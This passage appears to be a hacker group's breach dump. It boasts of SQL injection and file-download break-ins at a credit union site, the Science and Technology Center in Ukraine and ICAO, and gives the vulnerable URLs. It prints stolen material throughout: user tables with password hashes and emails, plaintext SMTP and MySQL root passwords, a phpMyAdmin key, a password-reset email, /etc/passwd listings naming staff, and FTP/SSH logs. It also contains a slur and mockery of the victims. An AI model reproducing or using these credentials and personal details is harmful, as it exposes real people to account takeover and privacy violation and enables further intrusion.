  671.         ,('34', '1', '2013-02-04 17:39:45', 'Telco Inside sales', 'telco_insidesale', '3d2c209c673d1d29d21d3dec5bb65e562ee907cb', '', 'Telco Systems', 'Used for inside sales by Gail and Erin', '', '', '3', '12', '0', '15', '1')
  672.         ,('35', '0', '2013-02-07 10:56:29', 'Meira Shitrit', 'meira', '7f371cf75994b38200ed90c9aa867bcad4aa4166', '', 'Telco Systems', 'Quality Assurance Manager', '', 'meiraz@telco.com', '2', '', '0', '2', '1')
  673.         ,('36', '1', '2013-02-12 06:56:47', 'Moshe Digmal', 'mdigmal', 'ee65fd9303075a30217663367ee54a9daaf62e54', '', 'Telco', '', '', 'mdigmal@telco.com', '3', '1345678', '0', '1', '1')
  674.         ,('37', '1', '2013-03-04 03:06:09', 'Meira Zitelbach Shitrit', 'meiraz', '006b3ed87b75ab8dcadf089e7b5a5d6d1d4cab10', '', 'Telco Systems IL', '', '', '', '2', '1345678', '0', '1', '1');
  675.  
  676.  
  677.  
  678.       BOUSBONUSBONUSBONUSBONUS!
  679.      oKAY, WE GET IT; WHAT THE FUCK DO YOU WANT!?
  680.  
  681.       BATM, GIMME THEIR SHIT PL0X!
  682.      You mean the company that owns Telco Systems?
  683.  
  684.       YES, YOU GIMME THAT SHIT; NOW!
  685.      You're in luck, they're vulnerable to the same thing!
  686.  
  687.       OM NOM NOM NOM NOM NOM NOM NOM NOM
  688.       OM NOM NOM NOM NOM NOM NOM NOM NOM
  689.  
  690.       BATM OPERATORS:
  691.       blake:962da309e5db8119b6bda644ec7b1aa0043435b8:Nikolay Hristov:+359 888 893824
  692.       maria:da1a1dee1cf51e12e41346dde66761a1e0c63223:Maria Nissan
  693.       masha:582a2631523e07b219826a048be997ca2c6773c7:Masha Zabaruk
  694.  
  695.  
  696.  
  697.   █████ █  █████  ████  █████ █████   ████  █████  ████  █       ████  ███  █████    █ █████ ███████   █   █ ████ █████  ████  ████
  698.       █    █   █ █    █   █     █    █    █ █   █ █    █ █       █     █  █ █        █   █      █      █   █ █  █   █   █    █ █  █
  699.       █    █   █ ██████   █     █    █    █ █   █ ██████ █       █     █    ████   ███   █      █      █   █ █  █   █   █    █ █  █
  700.       █    █   █ █    █   █     █    █    █ █   █ █    █ █       █     █    █     █  █   █      █      █   █ █  █   █   █    █ █  █
  701.       █ █  █   █ █    █   █   █████   ████  █   █ █    █ ████    ████  █    █████  ███ █████    █      █████ █  █ █████  ████  █  █
  702.  
  703.     Yes, you read it right; and the funniest part about it? It was a simple hack, sql injection:
  704.    See for yourself: http://www.creditunion.coop/news/story.php?id=64362
  705.  
  706.     Now, of course; This doesn't mean we jacked any cash, or changed anyones credit scores..
  707.    But it does show that simplicity goes a far way; now, here is a sample of the type of data in the download for it:
  708.  
  709.          WP-USERS
  710.          username, password, email, activation key.
  711.  
  712.          admin:$P$93jtG7JJBnfik1bFn2k.kZnjNajan71:kknope@cuna.com:X#%2)WrzV&lv
  713.          dklavitter:$P$9N6xDuhX39BXu1tMArNjBNJUZaVT2z1:dklavitter@cuna.com:D6V5z%**F$jb
  714.  
  715.          CMS
  716.  
  717.          name, pass, mail, access, login
  718.  
  719.          kevink@cuna.org:f3ca0f3d5e820fe1d583a0d2208f5faf:kevink@cuna.org:1290442727:1290442338
  720.          chill@cuna.coop:e66c39419b0b20ea68efbb4da1a56b25:chill@cuna.com:1363092146:1363091481
  721.          balderson:2eef47909b32eaef01cb90d365c7d185:balderson@cuna.com:1360090372:1360090123
  722.          pkeefe@cuna.com:161ebd7d45089b3446ee4e0d86dbcf92:pkeefe@cuna.coop:1287568255:1287567724
  723.          cgrabow@cuna.coop:b43190eb1b7f95cff61014b5d1480ee5:cgrabow@cuna.coop:1363043662:1363042929
  724.          fabbott@cuna.coop:1c8e3b2667c775961b06e5c023a30cea:fabbott@cuna.coop:1341492658:1341492658
  725.          lduval@cuna.coop:161ebd7d45089b3446ee4e0d86dbcf92:lduval@cuna.coop:1288308848:1288308590
  726.          jharvey@cuna.coop:c4a83adf116cc666d9d544ad05f5f14e:jharvey@cuna.coop:1351169586:1350935156
  727.  
  728.  
  729.   █████  █   ████  ███████  ████  █   █
  730.   █   █     █    █    █    █    █ █   █
  731.   █   █     █         █    █      █   █
  732.    ███       ████     █    █      █   █ - Science and Technology center in Ukraine.
  733.   █   █          █    █    █      █   █
  734.   █   █     █    █    █    █    █ █   █
  735.   █████  █   ████     █     ████   ███
  736.  
  737.  
  738.      Well now, this one was interesting; The Science and Technology Center in Ukraine?
  739.     First thing is first, they claimed that they weren't logging user ip-addresses, or other things.
  740.     So, naturally, we decided to look into the claim and began goofing around.
  741.  
  742.      By the time we came across an exploit in stcu.int, we managed to obtain something interesting.. their smtp configuration:
  743.  
  744.         SMTP configuration:
  745.  
  746.         function authgMail($from, $namefrom, $to, $nameto, $subject, $message, $custom_header = "")
  747.  
  748.         {
  749.  
  750. /*  your configuration here  */
  751.  
  752. //$smtpServer = "sslv3://smtp.gmail.com";
  753.          //does not accept STARTTLS
  754. $smtpServer = "tls://smtp.gmail.com";
  755.         //does not accept STARTTLS
  756. $port = "465"; // try 587 if this fails
  757. $timeout = "60";
  758.         //typical timeout. try 45 for slow servers
  759. $username = "webmaster@stcu.int";
  760.         //your gmail account
  761. $password = "G46572";
  762.         //the pass for your gmail
  763. //$password = "NetskY";
  764. $localhost = $_SERVER['REMOTE_ADDR'];
  765.         //requires a real ip
  766. $newLine = "\r\n"; //var just for newlines
  767.  
  768.  
  769.         From the email, we were able to reset the passwords of accounts belonging to the STCU & Funding parties project management login
  770.  
  771.                 Return-Path: <webmaster@stcu.int>
  772.                 Received: from [212.109.57.173] (xserve.stcu.int. [212.109.57.173])
  773.                 by mx.google.com with SMTP id 45sm17755596eeh.9.2014.04.11.06.38.21
  774.                 for <tdibragimov@mail.ru>
  775.                 (version=TLSv1 cipher=RC4-SHA bits=128/128);
  776.                 Fri, 11 Apr 2014 06:38:22 -0700 (PDT)
  777.                 Return-Path: <webmaster@stcu.int>
  778.                 To: tdibragimov@mail.ru
  779.                 From: STCU Webmaster <webmaster@stcu.int>
  780.                 Reply-To: STCU Webmaster <webmaster@stcu.int>
  781.                 Subject: New Password
  782.                 Date: Fri, 11 Apr 2014 16:40:32 +0300
  783.                 X-LibVersion: 3.3.1
  784.                 MIME-Version: 1.0
  785.                 Content-Type: multipart/alternative;
  786.                 boundary="_=_swift-13602789785347f0d0df28b2.21080339_=_"
  787.                 Content-Transfer-Encoding: 7bit
  788.                 Message-ID: <20140411134032.2316.1903919572.swift@www.stcu.int>
  789.  
  790.                 This is a message in multipart MIME format.  Your mail client should not
  791.                 be displaying this. Consider upgrading your mail client to view this
  792.                 message correctly.
  793.                 --_=_swift-13602789785347f0d0df28b2.21080339_=_
  794.                 Content-Type: text/html; charset=iso-8859-1
  795.                 Content-Transfer-Encoding: 8bit
  796.  
  797.                 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 1.0 Transitional//EN">
  798.                 <html>
  799.                 <head><title>New Password</title></head>
  800.                 <body>
  801.                 <p>First Name: Tahir</p>
  802.                 <p>Last Name: Ibragimov</p>
  803.                 <p>Your new password is "8N9cKVMK".
  804.                 But if you wish you can change it: use this new password to sign in. Then click on "Edit Info". Here you can generate new pass.</p>
  805.  
  806.         cat /etc/passwd
  807.  
  808.         nobody:*:-2:-2:Unprivileged User:/:/usr/bin/false
  809.         root:*:0:0:System Administrator:/var/root:/bin/sh
  810.         daemon:*:1:1:System Services:/var/root:/usr/bin/false
  811.         smmsp:*:25:25:Sendmail User:/private/etc/mail:/usr/bin/f
  812.         lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/fa
  813.         postfix:*:27:27:Postfix User:/var/spool/postfix:/usr/bin
  814.         www:*:70:70:World Wide Web Server:/Library/WebServer:/us
  815.         eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false
  816.         mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false
  817.         sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/b
  818.         qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/
  819.         cyrus:*:77:6:Cyrus User:/var/imap:/usr/bin/false
  820.         mailman:*:78:78:Mailman user:/var/empty:/usr/bin/false
  821.         appserver:*:79:79:Application Server:/var/empty:/usr/bin
  822.         unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
  823.  
  824.       We also managed to prove that they do indeed log, and that their claims were indeed bullshit; That is included in the download, along with 40,000 Emails from their smtp.
  825.         By the way, STCU works with WMD(Weapons Of Mass Destruction workers.) Through one of the SQL Injections, we noticed a DB called PPDB2 that had tables called "WeaponCode" several of them too, didn't bother with it; but, yeah.
  826.         Enjoy reading 30k+ emails, and owning fagots who make the weapons that destroy the world.
  827.  
  828.  
  829.   ████  █  █████  ██████   ████   █████
  830.  █    █      █   █      █ █    █ █     █
  831.  █    █      █   █        █    █ █     █
  832.   █████            █   █        ██████ █     █
  833.       █      █   █        █    █ █     █
  834.  █    █      █   █      █ █    █ █     █
  835.   ████  █  █████  ██████  █    █  █████
  836.  
  837.  
  838.         Alright, we're going to start this off with something fucking hilarious we found in their PHPBB Forum:
  839.             if ( !defined('IN_PHPBB') ) { die("Hacking attempt"); }
  840.  
  841.         LMFAO, That is pretty damn great; Now, what is ICAO?
  842.          The International Civil Aviation Organization is a specialized agency of the United Nations.
  843.          It codifies the principles and techniques of international air navigation and fosters the planning and development of international air transport to ensure safe and orderly growth.
  844.          Its headquarters are located in the Quartier International of Montreal, Quebec, Canada.
  845.  
  846.         Well, first off we found a MSACCESS SQL Injection on legacy.icao.int: http://legacy.icao.int/fsix/auditRep3_icvm.cfm?s=Solomon%20Islands&i=159
  847.          From the injection? We weren't able to do much, couldn't find the propper tables and only loaded the drives:
  848.          
  849.         legacy.icao.int drives:
  850.         A = Disk or network error
  851.         C = Could not find file 'C:\.mdb'.
  852.         D = Disk or network error.
  853.         E = Could not find file 'E:\.mdb'.
  854.         G = Could not find file 'G:\.mdb'.
  855.         S = Could not find file 'S:\.mdb'.
  856.  
  857.          So, we did some more research; Came across paris.icao.int which had a local file download exploit; and, whelp, the rest is history.
  858.  
  859.         paris.icao.int:
  860.  
  861.         MySQL root login:
  862.         1$dbhost = "localhost"; //Hostname of the MySQL-Server $dbname = "docman_open_meetings"; //Database-Name $dbuser = "root"; //Database-Username $dbpass = "paco6433"; //Database-Password
  863.        
  864.         /*
  865.         * phpMyAdmin configuration storage settings.
  866.         */
  867.  
  868.         /* User used to manipulate with storage */
  869.         $cfg['Servers'][$i]['controluser'] = 'aqueos_pma';
  870.         $cfg['Servers'][$i]['controlpass'] = 'Aque0SRT56uUU87';
  871.  
  872.         // configuration speciale
  873.         // rien de special
  874.  
  875.         phpmyadminkey: 9CgJjGCjG3KZSyajtvxGrpB3mp6ZYKf1pJlfvl61ruKwf
  876.  
  877.  
  878.         # $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
  879.         #
  880.         root:*:0:0:netfab06:/root:/bin/csh
  881.         toor:*:0:0:Bourne-again Superuser:/root:
  882.         daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
  883.         operator:*:2:5:System &:/:/usr/sbin/nologin
  884.         bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
  885.         tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
  886.         kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
  887.         games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
  888.         news:*:8:8:News Subsystem:/:/usr/sbin/nologin
  889.         man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
  890.         ftp:*:21:21:Anonymous FTP User:/ftp:/sbin/nologin
  891.         sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
  892.         smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
  893.         mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
  894.         bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
  895.         spamd:*:58:58:SpamAssassin user:/var/spool/spamd:/sbin/nologin
  896.         cyrus:*:60:60:The Cyrus mail server:/nonexistent:/sbin/nologin
  897.         pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
  898.         webadmin:*:79:79:Web Admin:/www:/bin/csh
  899.         www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
  900.         clamav:*:106:106:Clam Antivirus:/nonexistent:/sbin/nologin
  901.         nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
  902.         dovecot:*:143:143:Dovecot User:/var/empty:/usr/sbin/nologin
  903.         netfa5:*:1001:1001:Administrative User:/home/netfa5:/bin/tcsh
  904.         aqadmin:*:47000:4733:Utilisateur d administration, ne pas detruire.:/usr/local/.aqadmin/home/aqadmin:/bin/tcsh
  905.         aqbaseuser:*:47001:4733:Utilisateur d administration, ne pas detruire.:/usr/local/.aqadmin/home/baseuser:/sbin/nologin
  906.         aqbackup:*:47003:4733:Utilisateur de backup, ne pas detruire.:/usr/local/.aqadmin/home/backup:/bin/sh
  907.         aqmonitoring:*:47002:4733:Utilisateur de surveillance serveur, ne pas detruire.:/usr/local/.aqadmin/home/monitoring:/usr/sbin/nologin
  908.         accesclient:*:47100:4733:Utilisateur d administration pour le client, ne pas detruire.:/home/accesclient:/bin/tcsh
  909.         mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin
  910.         icaobigmanitou:*:1002:1002:webmaster:/home/icaobigmanitou:/sbin/nologin
  911.         administrator:*:1005:1005:Administrator:/home/administrator:/sbin/nologin
  912.         gfirican:*:1011:1011:George FIRICAN:/home/gfirican:/sbin/nologin
  913.         icaoeurnat:*:1012:1012:Official E-mail:/home/icaoeurnat:/sbin/nologin
  914.         jlevina:*:1014:1014:Johanna LEVINA:/home/jlevina:/sbin/nologin
  915.         ngoldschmid:*:1021:1021:Nikki GOLDSCHMID:/home/ngoldschmid:/sbin/nologin
  916.         pcuff:*:1024:1024:Patricia CUFF:/home/pcuff:/sbin/nologin
  917.         sfoure:*:1027:1027:Severine FOURE:/home/sfoure:/sbin/nologin
  918.         vkourenkov:*:1028:1028:Victor KOURENKOV:/home/vkourenkov:/sbin/nologin
  919.         lsuleymanova:*:1034:1034:Leyla Suleymanova:/home/lsuleymanova:/sbin/nologin
  920.         smtprelay:*:1037:1037:smtprelay:/home/smtprelay:/sbin/nologin
  921.         webmaster:*:1038:1038:WEBMASTER:/home/webmaster:/sbin/nologin
  922.         pcaviston1:*:1043:1043:Patricia CAVISTON:/home/pcaviston1:/sbin/nologin
  923.         pcaviston:*:1044:1044:Patricia CAVISTON:/home/pcaviston:/sbin/nologin
  924.         safireicao:*:1045:1045:SAFIREICAO:/home/safireicao:/sbin/nologin
  925.         enahmadov:*:1047:1047:Elkhan NAHMADOV:/home/enahmadov:/sbin/nologin
  926.         cdaly:*:1048:1048:Catherine DALY:/home/cdaly:/sbin/nologin
  927.         reception:*:1049:1049:Reception:/home/reception:/sbin/nologin
  928.         adm:*:1055:1055:ADMINISTRATION:/home/adm:/sbin/nologin
  929.         rdimartino:*:1056:1056:Rosa Di Martino:/home/rdimartino:/sbin/nologin
  930.         fbrosseau:*:1057:1057:Frédéric Brosseau:/home/fbrosseau:/sbin/nologin
  931.         nrallo:*:1058:1058:Nicolas Rallo:/home/nrallo:/sbin/nologin
  932.         jmasson:*:1059:1059:Jérémie MASSON:/home/jmasson:/sbin/nologin
  933.         skacprzak:*:1061:1061:Sebastian Kacprzak:/home/skacprzak:/sbin/nologin
  934.         lvonlanthen:*:1062:1062:Leon Vonlanthen:/home/lvonlanthen:/sbin/nologin
  935.         comregister:*:1064:1064:comregister:/home/comregister:/sbin/nologin
  936.         safire:*:1065:1065:safire:/home/safire:/sbin/nologin
  937.         natfig:*:1066:1066:natfig:/home/natfig:/sbin/nologin
  938.         ihofstetter:*:1069:1069:Isabelle HOFSTETTER:/home/ihofstetter:/sbin/nologin
  939.         llazosilva:*:1070:1070:Lino LAZO SILVA:/home/llazosilva:/sbin/nologin
  940.         bbenoist:*:1071:1071:Ben Benoist:/home/bbenoist:/sbin/nologin
  941.         eandd:*:1072:1072:EANDD:/home/eandd:/sbin/nologin
  942.         shalle:*:1073:1073:Sven HALLE:/home/shalle:/sbin/nologin
  943.         cottieno:*:1074:1074:Carolyne OTTIENO:/home/cottieno:/sbin/nologin
  944.         glpi:*:1075:1075:GLPI:/home/glpi:/sbin/nologin
  945.         amoater:*:1076:1076:Aurel Moater:/home/amoater:/sbin/nologin
  946.         lfonsecaalmeida:*:1078:1078:Luis Fonseca de Almeida:/home/lfonsecaalmeida:/sbin/nologin
  947.         ckeohan:*:1080:1080:Christopher KEOHAN:/home/ckeohan:/sbin/nologin
  948.         rsaidi:*:1081:1081:Rime Saidi:/home/rsaidi:/sbin/nologin
  949.         cludorf:*:1082:1082:Cornelia Ludorf:/home/cludorf:/sbin/nologin
  950.         rsalomon:*:1083:1083:Rodolphe SALOMON:/home/rsalomon:/sbin/nologin
  951.         adesaintseine:*:1084:1084:Amy de SAINT SEINE:/home/adesaintseine:/sbin/nologin
  952.         jludorf:*:1085:1085:Jürgen LUDORF:/home/jludorf:/sbin/nologin
  953.         admleave:*:1086:1086:ADM Leave:/home/admleave:/sbin/nologin
  954.         emurdoch:*:1087:1087:Eileen Murdoch:/home/emurdoch:/sbin/nologin
  955.         fax-in:*:1088:1088:Fax-IN:/home/fax-in:/sbin/nologin
  956.         cfigueiredo:*:1090:1090:Celso do Couto FIGUEIREDO:/home/cfigueiredo:/sbin/nologin
  957.         mmincic:*:1091:1091:Masa MINCIC:/home/mmincic:/sbin/nologin
  958.         fax-in2:*:1092:1092:fax-in2:/home/fax-in2:/sbin/nologin
  959.         bbrunette:*:1093:1093:Benoit BRUNETTE:/home/bbrunette:/sbin/nologin
  960.         lfigueiredo:*:1094:1094:Luis Pedro FIGUEIREDO:/home/lfigueiredo:/sbin/nologin
  961.         jricchetti:*:1095:1095:Joelle Ricchetti:/home/jricchetti:/sbin/nologin
  962.         donotreply:*:1096:1096:donotreply:/home/donotreply:/sbin/nologin
  963.  
  964. FTP & SSH log:
  965.  
  966. ftp7524 ftp             120.11.168.201  E5:Sftp7524                 120.11.168.201  Ê5:Sftp7555 ftp             221.203.97.34   6:Sftp7555                 221.203.97.34    6:Sftp8836 ftp             112.197.0.121   ÂF:Sftp8836                 112.197.0.121   ÏF:Sftp9909 ftp             36.33.33.235    R:Sftp9909                 36.33.33.235    R:Sftp3423 ftp             82.78.32.101    ²s:Sftp3443 ftp             125.76.163.137  ñs:Sftp3443                 125.76.163.137  t:Sftp3423                 82.78.32.101    2t:Sftp3603 ftp             114.39.30.54    Bu:Sftp3603                 114.39.30.54    Ku:Sftp3990 ftp             115.47.9.141    lx:Sftp3990                 115.47.9.141    vx:Sftp4044 ftp             14.198.72.4     y:Sftp4044                 14.198.72.4     Ey:Sftp6992 ftp             61.219.91.207   J’:Sftp6992                 61.219.91.207   …’:Sftp7564 ftp             123.247.15.92   Ú—:Sftp7564                 123.247.15.92   š˜:Sftp8719 ftp             85.185.238.216  ¢:Sftp8719                 85.185.238.216  œ¢:Sftp9643 ftp             134.249.97.161  ëª:Sftp9643                 134.249.97.161  ýª:Sftp9920 ftp             117.194.197.24  g­:Sftp9920                 117.194.197.24  q­:Sftp1673 ftp             39.1.1.60       ܽ:Sftp1673                 39.1.1.60       9¾:Sftp1953 ftp             123.195.45.36   ¢À:Sftp1953                 123.195.45.36   ÜÀ:Sftp2783 ftp             117.223.132.208 ÖÈ:Sftp2783                 117.223.132.208 ÷È:Sftp4489 ftp             114.39.9.89     oÚ:Sftp4489                 114.39.9.89     ƒÚ:Sftp1812 ftp             85.100.5.98     v#;Sftp1812                 85.100.5.98     “#;Sftp2576 ftp             220.133.175.190 E+;Sftp2576                 220.133.175.190 —+;Sftp7643 ftp             36.225.78.230   d;Sftp7643                 36.225.78.230   cd;Sftp8478 ftp             61.219.91.207   Än;Sftp8478                 61.219.91.207    o;Sftp8711 ftp             5.165.83.10     ¤p;Sftp8711                 5.165.83.10     ³p;Sftp8736 ftp              112.197.0.121   q;Sftp8736                 112.197.0.121   q;Sftp6551 ftp             112.90.231.27   ö†;Sftp6551                 112.90.231.27   ‡;Sftp1312 ftp             49.159.169.40   a;Sftp1312                 49.159.169.40   ̏;Sftp2030 ftp             101.17.42.34    Î˜;Sftp2030                 101.17.42.34    Û˜;Sftp3687 ftp             178.187.232.203 z«;Sftp3687                 178.187.232.203 Œ«;Sftp4408 ftp             111.37.6.21     ³;Sftp4408                 111.37.6.21     &³;Sftp6377 ftp             82.114.80.154   áÆ;Sftp6377                 82.114.80.154   èÆ;Sftp6954 ftp             124.228.11.92   ÛÌ;Sftp6954                 124.228.11.92   øÌ;Sftp7124 ftp             223.82.145.125  VÎ;Sftp7124                 223.82.145.125  kÎ;Sftp7664 ftp             223.78.158.133  ¼Ó;Sftp7664                 223.78.158.133  ÆÓ;Sftp9560 ftp             221.196.153.2   %å;Sftp9560                 221.196.153.2   1å;Sftp5390 ftp             1.52.237.140    î;Sftp5390                 1.52.237.14       0    î;Sftp1766 ftp             1.165.195.171   ‰ù;Sftp1766                 1.165.195.171   —ù;Sftp2714 ftp             113.227.42.32   ¿<Sftp2714                 113.227.42.32   Í<Sftp2782 ftp             111.37.11.38     <Sftp2782                 111.37.11.38    +<Sftp3867 ftp             36.225.78.230   ô
  967. <Sftp3867                 36.225.78.230   •<Sftp8382 ftp             58.42.237.32    6;<Sftp8382                 58.42.237.32    M;<Sftp8509 ftp             123.201.4.120   †<<Sftp8509                 123.201.4.120   ¦<<Sftp9240 ftp             115.47.9.141    ;D<Sftp9240                 115.47.9.141    KD<Sftp2979 ftp             116.113.47.38   bm<Sftp2979                 116.113.47.38   ¦m<Sftp3612 ftp             219.142.42.9    Gt<Sftp3612                 219.142.42.9    Xt<Sftp3734 ftp             89.209.126.207  gu<Sftp3734                 89.209.126.207  ou<Sftp8197 ftp             221.203.97.34   ¦¦<Sftp8197                 221.203.97.34   ²¦<Sftp8629 ftp             218.65.246.44   q¬<Sftp8629                 218.65.246.44   ¬<Sftp8877 ftp             221.194.231.19  z¯<Sftp8877                 221.194.231.19  ¯<Sftp8883 ftp             112.233.202.250 ¤¯<Sftp8883                 112.233.202.250 Ư<Sftp2042 ftp             124.202.160.186 ]½<Sftp2042                 124.202.160.186 j½<Sftp4303 ftp             99.137.34.85    žÀ<Sftp4303                 99.137.34.85    µÀ<Sftp7700 ftp             60.10.57.89     òÃ<Sftp7700                 60.10.57.89        Ä<Sftp2438 ftp             94.89.82.162    Ã×<Sftp2438                 94.89.82.162    AØ<Sftp3216 ftp             119.183.122.170  â<Sftp3216                 119.183.122.170 aâ<Sftp3665 ftp             218.205.36.192  ¾ç<Sftp3665                 218.205.36.192  Ñç<Sftp3721 ftp             112.197.0.121   ’è<Sftp3721                 112.197.0.121   è<Sftp4258 ftp             116.207.53.177  ï<Sftp4258                 116.207.53.177  +ï<Sftp4633 ftp             121.16.150.181  ¥ó<Sftp4633                 121.16.150.181  Øó<Sftp5598 ftp             117.170.250.137 Áþ<Sftp5598                 117.170.250.137 Ïþ<Sftp9610 ftp             115.249.55.107  ’&=Sftp9610                 115.249.55.107  š&=Sftp9738 ftp             82.137.12.34    e'=Sftp9738                 82.137.12.34    Ö.=Sftp3307 ftp             183.131.67.229  .I=Sftp3307                 183.131.67.229  <I=Sftp4127 ftp             1.214.254.122   ÀP=Sftp4127                 1.214.254.122   ÌP=Sftp5110 ftp             124.202.160.186 "Y=Sftp5110                 124.202.160.186 NY=Sftp7361 ftp             36.225.227.37   •l=Sftp7361                 36.225.227.37   ïl=Sftp8583 ftp             220.170.208.223 Žy=Sftp8583                 220.170.208.223 Åy=Sftp8778 ftp             117.136.37.2    {=Sftp8778                 117.136.37.2    Ø{=Sftp8992 ftp             222.126.146.107 %~=Sftp8992                 222.126.146.107 :~=Sftp9382 ftp             222.189.57.182  Œ‚=Sftp9382                 222.189.57.182  ´‚=Sftp2136 ftp             115.47.9.141    Û =Sftp2136                 115.47.9.141    ¡=Sftp3424 ftp             221.14.147.109  ­>Sftp3424                 221.14.147.109  Â>Sftp4797 ftp             180.215.124.28  k/>Sftp4797                 180.215.124.28  ,0>Sftp6193 ftp             180.218.2.84    oA>Sftp6193                 180.218.2.84    ‚A>Sftp9563 ftp             42.118.228.12   0h>Sftp9563                 42.118.228.12   Fh>Sftp3632 ftp             1.171.25.34     …Ž>Sftp3632                 1.171.25.34     œŽ>Sftp8037 ftp             134.255.142.228 ̺>Sftp8037                 134.255.142.228 Òº>Sftp2210 ftp             93.179.103.57   ŸÏ>Sftp2210                 93.179.103.57   ÇÏ>Sftp1904 ftp             78.189.127.105  S?Sftp1904                 78.189.127.105  Y?Sftp2687 ftp             99.137.34.85    j?Sftp2687                 99.137.34.85    €?Sftp9053 ftp             116.77.115.3    
  968. =?Sftp9053                 116.77.115.3    =?Sftp6037 ftp             61.172.115.227  ÏM?Sftp6037                 61.172.115.227  åM?Sftp2233 ftp             222.126.146.107 }]?Sftp2233                 222.126.146.107 ‡]?Sftp3817 ftp             113.240.231.170 /o?Sftp3817                 113.240.231.170 Eo?Sftp7923 ftp             93.157.19.68    # ?Sftp7923                 93.157.19.68    / ?Sftp8364 ftp             182.39.98.160   t¥?Sftp8364                 182.39.98.160   ‡¥?Sftp6371 ftp             61.172.115.227  éb@Sftp6371                 61.172.115.227  öb@Sftp8246 ftp             78.189.127.105  Ãw@Sftp8246                 78.189.127.105  Ëw@Sftp6628 ftp             178.33.21.143   ®Ü@Sftp6628                 178.33.21.143   ¯Ü@Sftp634  ftp             125.104.83.30   ?ASftp634                  125.104.83.30   IASftp5341 ftp             27.38.38.128    =BSftp5341                 27.38.38.128    OBSftp1420 icaobigmanitou  94.228.187.146  åSBSftp1420                 94.228.187.146  øSBSftp1923 icaobigmanitou  94.228.187.146  +TBSftp1923                 94.228.187.146  2TBSftp2494 ftp             36.227.111.251  …ÅBSftp2494                 36.227.111.251  ÅBSftp2830 ftp             222.126.146.107 +CSftp2830                 222.126.146.107 +CSftp5453 ftp             36.239.34.122   ¼DCSftp5453                 36.239.34.122   ÄDCSftp6925 ftp             114.39.29.94    ÜQCSftp6925                 114.39.29.94    èQCSftp7034 ftp             1.52.237.230    êRCSftp7034                 1.52.237.230    óRCSftp9194 ftp             60.29.59.58     ö»CSftp9194                 60.29.59.58      ¼CSftp5759 ftp             221.1.213.86    ²úCSftp5759                 221.1.213.86    ÎúCSftp3980 ftp             178.137.2.93    KDSftp3980                 178.137.2.93    RKDSftp3019 ftp             180.166.245.174 ·¯DSftp3019                 180.166.245.174 ȯDSftp3387 ftp             123.171.4.157   ¹´DSftp3387                 123.171.4.157   Ë´DSftp7297 ftp             119.86.148.103  GãDSftp7297                 119.86.148.103  ZãDSftp2948 ftp             134.255.159.163 ùESftp2948                 134.255.159.163 ýESftp5755 ftp             85.185.238.216  †3ESftp5755                 85.185.238.216  “3ESftp9992 ftp             94.41.71.136    ÃYESftp9992                 94.41.71.136    ØYESftp1697 ftp             58.116.64.8     9KFSftp1697                 58.116.64.8     EKFSftp3896 ftp             58.116.64.8     À_FSftp3896                 58.116.64.8     ù_FSftp9257 icaobigmanitou  94.228.187.146  Ç“FSftp9257                 94.228.187.146  •FSftp8567 ftp             49.159.169.40   Z£FSftp8567                 49.159.169.40   u£FSftp7428 ftp             93.157.21.151   üåFSftp7428                 93.157.21.151   æFSftp4878 ftp             66.249.79.14    ð9GSftp4878                 66.249.79.14    ñ9GSftp4879 ftp             66.249.74.104   ó9GSftp4879                 66.249.74.104   ó9GSftp6702 ftp             36.239.32.22    èNGSftp6702                 36.239.32.22    ôNGSftp5388 ftp             66.249.79.14    [®GSftp5388                 66.249.79.14    \®GSftp2274 ftp             201.94.154.27   àñGSftp2274                 201.94.154.27   çñGSftp4545 ftp             163.125.220.43  ÊzHSftp4545                 163.125.220.43  ÓzHSftp6219 ftp             74.95.10.210     ŒHSftp6219                 74.95.10.210    ŒHSftp7843 ftp             66.249.75.152   šžHSftp7843                 66.249.75.152   šžHSftp7843 ftp             66.249.75.152   ›žHSftp7843                 66.249.75.152   œžHSftp8698 ftp             188.253.41.195  †ÁHSftp8698                 188.253.41.195  ŠÁHSftp3916 ftp             176.205.133.107 §èHSftp3916                 176.205.133.107 ¯èHSftp6477 ftp             27.32.173.218   ‹ ISftp6477                 27.32.173.218   Ê ISftp1711 ftp             5.53.205.21     PAISftp1711                 5.53.205.21     sAISftp6754 ftp             221.196.55.244  „yISftp6754                 221.196.55.244  ™yISftp8042 ftp             220.244.55.106  àxJSftp8042                 220.244.55.106  þxJSftp9618 ftp             85.185.238.216  T‹JSftp9618                 85.185.238.216  ^‹JSftp5554 ftp             94.41.85.175    BËJSftp5554                 94.41.85.175    FËJSftp5664 ftp             60.29.59.58     íÌJSftp5664                 60.29.59.58     üÌJSftp5736 ftp             222.141.54.78   zÍJSftp5736                 222.141.54.78   “ÍJSftp3607 ftp             195.244.160.110 yKSftp3607                 195.244.160.110 zKSftp1112 ftp             36.224.17.227   $
  969. KSftp1112                 36.224.17.227   ,
